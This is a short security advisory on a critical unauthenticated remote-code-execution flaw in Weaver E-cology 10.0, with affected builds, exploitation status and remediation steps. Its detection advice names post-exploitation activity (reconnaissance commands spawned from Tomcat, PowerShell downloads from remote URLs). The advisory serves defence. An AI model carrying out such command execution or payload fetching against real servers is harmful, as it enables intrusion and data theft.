Critical Unauthenticated RCE in Weaver E‑cology (CVE‑2026‑22679) Exploited Since March
What It Is – A critical remote‑code‑execution (RCE) flaw (CVE‑2026‑22679) in Weaver E‑cology 10.0 allows unauthenticated attackers to invoke arbitrary system commands via an exposed debug API. The vulnerability was weaponised within weeks of the vendor’s patch release, before public disclosure.
Exploitability – Actively exploited in the wild from mid‑March 2026. Public PoC exists in the form of network traffic captured by Vega. CVSS v3.1 base score: 9.8 (Critical).
Affected Products – Weaver E‑cology 10.0 builds prior to 20260312 (the vendor’s March 12, 2026 security update). The platform is an enterprise office‑automation and collaboration suite used primarily by Chinese organizations for HR, document management, and workflow automation.
TPRM Impact – The flaw provides a direct path to execute commands on a third‑party’s server without any credentials, exposing downstream customers to data leakage, lateral movement, and potential supply‑chain compromise. Organizations that integrate Weaver E‑cology into their business processes face heightened risk of service disruption and inadvertent exposure of proprietary data.
Recommended Actions –
- Verify the exact version of Weaver E‑cology in use; if earlier than build 20260312, apply the vendor’s security update immediately.
- Conduct a forced‑upgrade audit across all subsidiaries and managed service providers that host the product.
- Review firewall and IDS/IPS logs for outbound connections to unknown PowerShell download URLs and for anomalous
whoami,ipconfig,tasklistcommands originating from the Java/Tomcat process. - Disable any non‑essential debug or API endpoints in the application configuration.
- Implement endpoint‑level monitoring for file‑less PowerShell activity and enforce strict application‑allow‑list policies.
Source: BleepingComputer – Weaver E‑cology critical bug exploited in attacks since March